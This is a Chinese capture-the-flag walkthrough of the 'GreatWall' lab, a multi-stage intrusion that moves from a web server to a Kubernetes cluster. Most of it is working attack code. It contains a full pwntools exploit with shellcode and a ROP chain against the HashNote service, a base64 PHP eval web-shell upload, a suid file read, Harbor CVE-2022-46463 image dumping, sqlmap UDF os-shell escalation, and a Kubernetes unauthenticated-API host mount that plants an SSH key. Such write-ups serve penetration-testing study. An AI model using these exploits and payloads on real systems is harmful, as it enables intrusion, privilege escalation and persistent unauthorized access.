春秋云境-GreatWall

发表于 分类于

学习点

一、k8s未授权:浅析K8S各种未授权攻击方法

拓扑

image-20250525231418330

flag1

TP5 RCE,fscan

[+] ftp 172.28.23.26:21:anonymous 
   [->]OASystem.zip

[+] PocScan http://172.28.23.33:8080 poc-yaml-spring-actuator-heapdump-file 
[+] PocScan http://172.28.23.33:8080 poc-yaml-springboot-env-unauth spring2

flag3

heapdump + shiro

http://172.28.23.33:8080/actuator/heapdump

发现key,AES模式

AZYyIgMYhG6/CzIJlvpR2g==

发现高端口 59696 运行了一个elf:/home/ops01/HashNote,pwn一下

from pwn import *

elf = ELF('./HashNote')
context(arch=elf.arch, os='linux', log_level='debug')
# p = process('./HashNote')
p = remote('172.28.23.33', 59696)

def send_command(command):
    p.sendlineafter(': ', str(command))

def add_entry(key, value):
    send_command(1)
    p.sendlineafter('Key: ', key)
    p.sendlineafter('Data: ', value)

def get_entry(key):
    send_command(2)
    p.sendlineafter('Key: ', key)

def update_entry(key, value):
    send_command(3)
    p.sendlineafter('Key: ', key)
    p.sendlineafter('Data: ', value)

def set_username(value):
    send_command(4)
    p.sendafter('New username: ', value)

p.sendlineafter('Username: ', '123')
p.sendlineafter('Password: ', 'freep@ssw0rd:3')

add_entry('aabP', 'aaaaaaaa')
add_entry('aace', 'C' * 0xc0)

sc = [
    '\x6a\x3b',                   # push   0x3b
    '\x58',                       # pop    rax
    '\x99',                       # cdq
    '\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68', # movabs rbx, 0x68732f6e69622f2f
    '\x53',                       # push   rbx
    '\x48\x89\xe7',               # mov    rdi, rsp
    '\x52',                       # push   rdx
    '\x57',                       # push   rdi
    '\x48\x89\xe6',               # mov    rsi, rsp
    '\x0f\x05'                    # syscall
]
shellcode = b''.join(sc)
username_addr = 0x5dc980
fake_obj_addr = username_addr + 0x10

def arbitrary_read(addr):
    payload = p64(fake_obj_addr)
    payload += p64(0xdeadbeef)

    fake_obj = p64(fake_obj_addr + 0x10) + p64(4)
    fake_obj += 'aahO'.ljust(0x10, '\x00')
    fake_obj += p64(addr) + p64(8) + 'aaaaaaaa'

    payload += fake_obj
    payload += shellcode
    payload = payload.ljust(128, '\x00')
    set_username(payload)
    get_entry('aahO')

def arbitrary_write(addr, data):
    payload = p64(fake_obj_addr)
    payload += p64(0xdeadbeef)
    fake_obj = p64(fake_obj_addr + 0x10) + p64(4)
    fake_obj += 'aahO'.ljust(0x10, '\x00')
    fake_obj += p64(addr) + p64(len(data)) + 'aaaaaaaa'
    payload += fake_obj
    payload += shellcode
    payload = payload.ljust(128, '\x00')
    set_username(payload)
    update_entry('aahO', data)

environ = 0x5e4c38 
arbitrary_read(environ)
stack_addr = u64((p.recvuntil('\x7f', drop=False)[-6:].ljust(8, '\0')))
success('stack_addr', stack_addr)

rdi = 0x0000000000405e7c
rsi = 0x000000000040974f
rax = 0x00000000004206ba
rdx_rbx = 0x000000000053514b
shr_eax_2 = 0x0000000000523f2e
syscall_ret = 0x00000000004d9776

payload = p64(rdi) + p64(username_addr & ~0xfff) + p64(rsi) + p64(0x1000) + p64(rdx_rbx) + p64(7) + p64(0) + p64(rax) + p64(0xa << 2) + p64(shr_eax_2) + p64(syscall_ret) + p64(username_addr + 0x48)

arbitrary_write(stack_addr - 0x210, payload)
p.sendline('uname -ar')
p.interactive()

flag2

ftp下载文件审计发现任意文件写shell

curl -X POST -d "imgbase64=data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbJ3Bhc3MnXSk7Pz4=" "http://172.28.23.26/uploadbase64.php"
{"src":"upload/2025-05-26-6834854461dbb.php"}

蚁剑 bypass df + suid

/usr/bin/base32 /flag02.txt

双网卡 扫描 + 多层代理

172.22.14.37 K8s
172.22.14.46 Harbor

flag5

Harbor CVE-2022-46463未授权访问,查看所有镜像,下载secret镜像

python harbor.py http://172.22.14.46/ --dump harbor/secret --v2

./caches/harbor_secret/latest/413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49/f1ag05_Yz1o.txt

flag6

下载projectadmin镜像

python harbor.py http://172.22.14.46/ --dump project/projectadmin --v2

有个ProjectAdmin-0.0.1-SNAPSHOT.jar,解压看下配置文件发现mysql,UDF提权

sqlmap.py -d "mysql://root:[email protected]:3306/mysql" --os-shell

image-20250527005605820

flag4

172.22.14.37 开放 10250 和 2379 端口,扫一下6443,存在 Kubernetes API server 未授权

https://172.22.14.37:6443

下载:https://dl.k8s.io/release/v1.30.0/bin/windows/amd64/kubectl.exe

列pod

kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods

image-20250527003456355

查看pod

kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ describe pod nginx-deployment-58d48b746d-d6x8t

同样构造一个nginx的yaml用于挂载到宿主机的 / 路径

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  labels:
    app: nginx
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx:1.8
        volumeMounts:
        - mountPath: /mnt
          name: test-volume
      volumes:
      - name: test-volume
        hostPath:
          path: /

部署pod

kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f evil.yaml

列pod

kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods

进容器

kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-szx96 /bin/bash

写ssh公钥

ssh-keygen -t rsa -b 4096
echo "ssh-rsa AAAAB3NzaC..." > /mnt/root/.ssh/authorized_keys

ssh连接,mysql找flag

image-20250527005210519